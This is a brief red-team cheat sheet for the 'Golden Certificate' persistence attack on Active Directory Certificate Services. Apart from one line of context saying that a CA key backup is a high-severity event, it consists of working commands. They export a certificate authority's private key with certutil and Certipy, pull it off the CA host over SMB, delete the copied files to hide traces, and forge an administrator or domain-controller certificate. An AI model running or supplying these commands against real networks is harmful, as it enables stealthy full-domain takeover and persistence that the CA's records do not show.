Golden Certificate
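THEFT3 + DPERSIST1 (technique IDs from SpecterOps' "Certified Pre-Owned" paper): the CA certificate and private key are taken from the CA host and then used to sign certificates offline. Certificates produced this way are not recorded in the CA database, so any backup or export of the CA key on the CA host should be treated as a high-severity event.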
Cmd > certutil.exe -backupkey -f -p Passw0rd! C:\Windows\CABackup
$ smbclient.py -k -no-pass CA01.megacorp.local
# use c$
# cd windows/CABackup
# get CorpCA.p12
# rm CorpCA.p12
# cd ..
# rmdir CABackup
$ certipy cert -pfx CorpCA.p12 -password 'Passw0rd!' -export -out CorpCA.pfx
$ </dev/null openssl s_client -connect <DC_IP>:636 | openssl x509 > dc.crt
Certipy
$ certipy ca -backup -ca CorpCA -k -no-pass -target CA01.megacorp.local -dc-ip 192.168.1.11 -ns 192.168.1.11
$ certipy forge -ca-pfx CorpCA.pfx -upn '[email protected]' (or -dns DC01.megacorp.local) -subject 'CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local' -sid <DC01_SID> -crl 'ldap:///***'